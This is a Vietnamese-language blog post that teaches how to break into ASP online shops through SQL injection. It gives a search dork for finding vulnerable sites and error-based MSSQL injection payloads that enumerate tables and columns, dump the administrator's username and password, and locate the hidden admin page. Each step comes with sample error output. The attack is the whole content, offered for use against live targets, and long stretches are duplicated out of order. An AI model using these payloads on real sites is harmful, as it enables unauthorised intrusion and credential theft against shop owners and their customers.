Cơ Bản Hack Shop ASP
Dork : allinurl:"shopdisplayproducts.asp?id="Code : http://www.victim.com/shopping/shopd…cts.asp?id=153‘
Nếu ko báo lỗi, bạn hãy thử thay id bằng cat xem
Code :http://www.victim.com/shopping/shopd…ts.asp?cat=153‘
Nếu shop có lỗi thì sẽ xuất hiện thông báo
Code :Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”./shopping/shopdisplayproducts.asp, line 93
Lúc này bạn thấy Unclosed quotation mark before the character string ‘ đối với lỗi này ta sẽ dùng
Code : %20and%201=convert(int,(select%20top%201%20table_n ame%20from%20information_schema.tables))–sp_password
Còn nếu nó báo thế này
Code : Microsoft JET Database Engine error ‘80040e14′ Syntax error in query _expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘5′%’ and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 467
Thì đây là lỗi jet Bạn hãy chuyển qua phần 2
Bây giờ ta tiếp tục :
Code : Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”./shopping/shopdisplayproducts.asp, line 93
Bước I:
Lấy table : đây là câu lệnh cơ bản để lấy table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))–sp_password
bạn xoá dấu ‘ rồi thêm dòng query này vào phía sau ta được như thế này
Code : http://www.victim.com/shopping/shopd…ts.asp?cat=153 and 1=convert(int,(select top 1 table_name from information_schema.tables))–sp_password
Chú ý : %20 là mã ascii của dấu cách (space) , do IE ko chấp nhận dấu cách nên nó phải chuyển sang ascii
Code : Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘ver_Faq’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
kết quả ‘ver_Faq’ là tên của table đầu tiên trong cơ sở dữ liệu câu lệnh lấy table tiếp theo :
Code : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (’ver_Faq’)))–sp_password ta được thế này
Code : Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘ver_Faq’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
kết quả ‘ver_Faq’ là tên của table đầu tiên trong cơ sở dữ liệu câu lệnh lấy table tiếp theo :
Code : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (’ver_Faq’)))–sp_password ta được thế này
Code : http://www.victim.com/shopping/shopd…ts.asp?cat=153 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (’ver_Faq’)))–sp_password
Lúc này sẽ được
Code : ProductsMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘coupons’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Ta cứ lấy tiếp như vậy :
Code : http://www.victim.com/shopping/shopd…ts.asp?cat=153 and 1=convert(int,(select%20top%201%20table_name%20fro m%20informa tion_schema.tables%20where%20table_name%20not%20in %20(’ver_Faq’,'coupons’)))–sp_password
Code : http://www.victim.com/shopping/shopd…ts.asp?cat=153 and 1=convert(int,(select%20top%201%20table_name%20fro m%20informa tion_schema.tables%20where%20table_name%20not%20in %20(’ver_Faq’,'coupons’)))–sp_password
Bước II :
Lấy column mục đích của chúng ta là tìm thông tin liên quan đến admin , thông thường nó nằm trong các table : users, tbluser,AdminUsers……….Giả sử ở đây là tbluser
Lấy column mục đích của chúng ta là tìm thông tin liên quan đến admin , thông thường nó nằm trong các table : users, tbluser,AdminUsers……….Giả sử ở đây là tbluser
Câu truy vấn dùng để lấy column:
Code : and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=(’tbluser’)))–sp_password
ta được thế này
Code : http://www.victim.com/shopping/shopd…ts.asp?cat=153 and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=(’tbluser’)))–sp_password lúc này ta được
Code : ProductsMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldauto’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo:
Code : and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=(’tbluser’) and column_name not in (’fldauto’)))–sp_password
Khi thêm code xong sẽ như thế này:
Code : http://www.victim.com/shopping/shopd…ts.asp?cat=153 and 1=convert(int,(select%20top%201%20column_name%20fr om%20inform ation_schema.columns%20where%20table_name=(’tbluse r’)%20and%20column_name%20not%20in%20(’fldauto’))) –sp_password
Ta được
Code : Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldusername’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Hoặc có thể lấy cả 2 cùng 1 lúc
Code : and 1=convert(int,(select top 1 fldusername%2b’/'%2bfldpassword from tbluser))–sp_password
%2b là mã ascii của dấu +
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin/1234′ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Chú ý :Nhiều khi bạn không thể tìm thấy table tbluser hoặc users hay các table (có vẻ) liên quan đến thông tin admin .Lúc này chẳng nhẽ bạn đành lấy lần lượt các column trong từng table sao ? Chúng ta có 1 cách khác nhanh hơn đó là dùng từ khoá like
Giả sử ta cần tìm column ‘fldpassword’ mà không biết nó ở đâu .Ta thử search tại Table đầu tiên ‘ver_Faq’
Câu truy vấn như sau:
Code : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’ver_Faq’) and column_name like (’%25pass%25′)))–sp_password
Bạn chú ý : câu truy vấn này sẽ trả về tên của column đầu tiên mà tên của nó có chứa chữ “pass”
Code : No products match your search
Oh vậy là table ‘ver_Faq’ ko có column nào mà tên của nó có chứa chữ “pass” .Đến đây chắc bạn biết làm gì tiếp, ta cứ search các table khác, table nào có nó sẽ cho ra kết quả như sau :
TríchMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldpassword’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Bước III
Sau khi đã có username và password việc còn lại là tìm link admin
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
Code : and 1=convert(int,(select top 1 fieldname%2b’/'%2bfieldvalue from configuration where fieldname=’xadminpage’))–sp_password
Code : Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘xadminpage/5h0padm1n.asp’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Code : and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=(’tbluser’) and column_name not in (’fldauto’)))–sp_password
Khi thêm code xong sẽ như thế này:
Code : http://www.victim.com/shopping/shopd…ts.asp?cat=153 and 1=convert(int,(select%20top%201%20column_name%20fr om%20inform ation_schema.columns%20where%20table_name=(’tbluse r’)%20and%20column_name%20not%20in%20(’fldauto’))) –sp_password
Ta được
Code : Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldusername’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo :
Code : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’tbluser’) and column_name not in (’fldauto’,'fldusername’)))–sp_password
Code : http://www.victim.com/shopping/shopd…ts.asp?cat=153 and 1=convert(int,(select%20top%201%20column_name%20fr om%20inform ation_schema.columns%20where%20table_name=(’tbluse r’)%20and%20column_name%20not%20in%20(’fldauto’,'f ldusername’)))–sp_password
Lúc này xuất hiện
Code : Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldpassword’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Giờ ta lấy username và password Câu truy vấn :
Lấy username
Code : and 1=convert(int,(select top 1 fldusername from tbluser))–sp_password
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin’ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
———-> username là admin
Lấy password
Code : and 1=convert(int,(select top 1 fldpassword from tbluser))–sp_password
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘1234′ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
———-> pass là 1234
Code : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’tbluser’) and column_name not in (’fldauto’,'fldusername’)))–sp_password
Code : http://www.victim.com/shopping/shopd…ts.asp?cat=153 and 1=convert(int,(select%20top%201%20column_name%20fr om%20inform ation_schema.columns%20where%20table_name=(’tbluse r’)%20and%20column_name%20not%20in%20(’fldauto’,'f ldusername’)))–sp_password
Lúc này xuất hiện
Code : Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldpassword’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Giờ ta lấy username và password Câu truy vấn :
Lấy username
Code : and 1=convert(int,(select top 1 fldusername from tbluser))–sp_password
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin’ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
———-> username là admin
Lấy password
Code : and 1=convert(int,(select top 1 fldpassword from tbluser))–sp_password
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘1234′ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
———-> pass là 1234
Hoặc có thể lấy cả 2 cùng 1 lúc
Code : and 1=convert(int,(select top 1 fldusername%2b’/'%2bfldpassword from tbluser))–sp_password
%2b là mã ascii của dấu +
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin/1234′ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Chú ý :Nhiều khi bạn không thể tìm thấy table tbluser hoặc users hay các table (có vẻ) liên quan đến thông tin admin .Lúc này chẳng nhẽ bạn đành lấy lần lượt các column trong từng table sao ? Chúng ta có 1 cách khác nhanh hơn đó là dùng từ khoá like
Giả sử ta cần tìm column ‘fldpassword’ mà không biết nó ở đâu .Ta thử search tại Table đầu tiên ‘ver_Faq’
Câu truy vấn như sau:
Code : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’ver_Faq’) and column_name like (’%25pass%25′)))–sp_password
Bạn chú ý : câu truy vấn này sẽ trả về tên của column đầu tiên mà tên của nó có chứa chữ “pass”
Code : No products match your search
Oh vậy là table ‘ver_Faq’ ko có column nào mà tên của nó có chứa chữ “pass” .Đến đây chắc bạn biết làm gì tiếp, ta cứ search các table khác, table nào có nó sẽ cho ra kết quả như sau :
TríchMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldpassword’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Bước III
Sau khi đã có username và password việc còn lại là tìm link admin
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
Code : and 1=convert(int,(select top 1 fieldname%2b’/'%2bfieldvalue from configuration where fieldname=’xadminpage’))–sp_password
Code : Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘xadminpage/5h0padm1n.asp’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
No comments:
Post a Comment